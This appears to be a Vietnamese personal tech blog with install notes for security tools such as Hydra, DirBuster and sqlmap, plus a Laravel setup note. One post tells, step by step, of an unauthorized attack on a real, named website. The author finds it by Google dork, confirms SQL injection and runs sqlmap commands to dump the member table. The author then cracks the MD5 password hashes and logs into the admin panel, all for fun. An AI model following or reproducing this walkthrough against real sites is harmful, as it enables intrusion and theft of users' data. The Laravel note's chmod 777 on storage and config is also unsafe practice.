Categories
Chia sẻ

Nhận lấy file từ Lovepik.com

Chuyện là mình vừa mới đăng ký gói gì đó bên lovepik.com mà không rõ nữa :D, gói gì chỉ khoản 15$ 1 năm thôi, nó nói đang khuyến mãi, nên mình đã đăng ký, và giờ thì có thể download không giới hạn, các bạn nào muốn download trên lovepik.com thì để comment bên dưới, chiều đi làm về mình sẽ dành buổi tối để download các file đó hộ các bạn, hình như gói của mình không thể download cái gì đó doanh nghiệp ý, thành thử nếu có download không thành công vẫn là chuyện bình thường nhé. Nếu các bạn cần gấp, có thể gọi cho mình qua số điện thoại 0966034211, mình tên Thân. Cảm ơn đã đọc bài viết ah.

Categories
Linux

Cài đặt Teamviewer trên Ubuntu 20.04

wget https://download.teamviewer.com/download/linux/teamviewer_amd64.deb
sudo apt install ./teamviewer_amd64.deb
Categories
Linux

Cài đặt Crips IP Tools trên Ubuntu 20.04

Clone Git: git clone https://github.com/Manisso/Crips.git

Chạy thử Crips:

cd Crips
python crips.py
Categories
Linux

Cài đặt Wireshark trên Ubuntu 20.04

Cài đặt:

sudo apt update
sudo apt upgrade
sudo apt install wireshark

Chọn Yes

Thêm người dùng đến Wireshare: sudo usermod -aG wireshark $(whoami)

Khởi động lại máy tính

Show network interface: ip addr show

Categories
Linux

Cài đặt Nmap Gui (Zenmap) trên Ubuntu 20.04

Cài đặt:

mkdir -p ~/Downloads/zenmap
cd ~/Downloads/zenmap

wget http://archive.ubuntu.com/ubuntu/pool/universe/p/pygtk/python-gtk2_2.24.0-6_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/universe/n/nmap/zenmap_7.80+dfsg1-1build1_all.deb

sudo apt install ./*.deb
Categories
Linux

Cài đặt Hydra trên Ubuntu 20.04

Cài đặt: sudo apt-get install hydra-gtk

Test thử:

xhydra
hydra

Nếu gặp lỗi “Failed to load module “canberra-gtk-module” trong khi chạy Hydra thì gõ lệnh:

sudo apt-get install libcanberra-gtk-module

Gỡ bỏ cài đặt Hydra

sudo apt-get purge hydra-gtk && sudo apt-get autoremove && sudo apt-get autoclean
Categories
Linux

Cài đặt DirBuster trên Ubuntu 20.04

Download file taị Desktop:

https://sourceforge.net/projects/dirbuster/files/DirBuster%20(jar%20+%20lists)/1.0-RC1/DirBuster-1.0-RC1.zip/download

Giải nén trên Desktop, ta sẽ có thư mục “DirBuster-1.0-RC1”

Chaỵ câu lệnh:

sudo mkdir /opt/dirbuster
cd /opt/dirbuster
sudo mv /home/nangthuyen85/Desktop/DirBuster-1.0-RC1/* .
./DirBuster-1.0-RC1.sh

Nếu xuất hiện lỗi: “./DirBuster-1.0-RC1.sh: line 2: java: command not found”

Thì caì đặt java vào:

sudo apt-get install openjdk-8-jre
Categories
Linux

Cài đặt Sqlmap trên Ubuntu 20.04

Clone ( cài đặt ) git sqlmap: git clone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Chạy thử:

cd sqlmap-dev
python3 sqlmap.py

Update Sqlmap: python3 sqlmap.py –update

Create new file “SQLMAP.desktop” ở Desktop

[Desktop Entry]
Name=SQLMAP
Comment=Terminal for SQLMAP
Exec=gnome-terminal --working-directory="/home/nangthuyen85/sqlmap-dev" -x bash -c "python3 sqlmap.py; exec bash"
Terminal=false
Type=Application
Icon=/home/nangthuyen85/Icons/icon-sqlmap.gif

Xử lý lệnh để đưa nó vào Favorites

sudo cp /home/nangthuyen85/Desktop/SQLMAP.desktop /usr/share/applications
cd /usr/share/applications
sudo chmod 644 SQLMAP.desktop
sudo chown root:root SQLMAP.desktop

Nhấn phím Windows và nhập “sqlmap”, click chuột phải vào Icon và chọn “Add to Favorites”

Xóa SQLMAP.desktop ở Desktop đi

Categories
Hacked

Hacked binhdonghung.com.vn

Ok, hôm nay mình học hack

Đầu tiên là lên google search với từ khoá: vn inurl:products.php?cat=

Thì xuất hiện trang ở Việt Nam tên là binhdonghung.com.vn

Click thử vào đó thì thấy đường dẫn:

http://binhdonghung.com.vn/products.php?cat=54&root=37&lang=language

Chỉnh sửa lại đường dẫn 1 tí thành:

http://binhdonghung.com.vn/products.php?cat=54'

Thì thấy như sau:

Rồi, xác định em nó bị dính SQL Injection

Mở sqlmap lên, gõ thử vào dòng lệnh:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54"

Nó có chút bảo vệ

Cụ thể giờ server nào cũng có bảo vệ, không có gì là dễ dàng cả.

Giờ chơi trò google để mà qua mặt lớp bảo vệ này chứ

Sau khi qua mặt được nó rồi, thì chạy lại lần nữa:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54"

Trong lúc chờ sqlmap này chạy, mình xem web sơ qua, thấy web này bị bỏ hoang rồi, chán nhỉ, chẳng quan tâm web gì cả.

Rồi, nó chết chắc rồi:

Xem database name của nó nào:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" -dbs

Coi nó có bao nhiêu table nào

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" -tables -D binhdonghungcom_data

25 table, quan tâm đến thằng “tblmembers” thôi nhé

Download thằng này về thôi:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" --dump -D binhdonghungcom_data -T tblmembers

Chà, nhìn cái này chắc mấy cụ đi trước để lại đây

Thấy cái e10 là biết MD5 rồi, với lại cái thằng này không có quyền truy cập All nữa chứ, mà active cũng bằng 0 luôn, không dùng được rồi

Dò thử mấy mã MD5 cái coi

Đù ra thằng này:

Rồi, vấn đề là dò link đăng nhập, gõ thử admin xem sao:

Đù, thế là em gần như chết rồi đó, thử đăng nhập 1 cái xem thế nào nhé

Thôi, em nó chết rồi các bác ah

Tiếc quá, web hoang, tính viết gì đó để cảnh báo, mà chắc chủ website cũng chả thèm xem đâu, nội dung thì từ hồi em còn bú sữa bình, giờ chuyển qua bú nước biển rồi mà vẫn không cập nhật gì.

Hết rồi, thế là 1 victim bị hack, lý do là: hôm nay đi nhậu vui quá, về hack chơi.

Categories
Laravel

Lấy dự án laravel từ github về local

1/ cd /var/www/local.hiroam.vn

2/ sudo composer update

3/ cp .env.example .env

4/ sudo php artisan key:generate

Bước 3 và bước 4 cũng có thể thay thế bằng cách copy file gốc .env từ source gốc

5/

sudo chmod -R 777 storage
sudo chmod -R 777 bootstrap/cache
sudo chmod -R 777 uploads
sudo chmod -R 777 config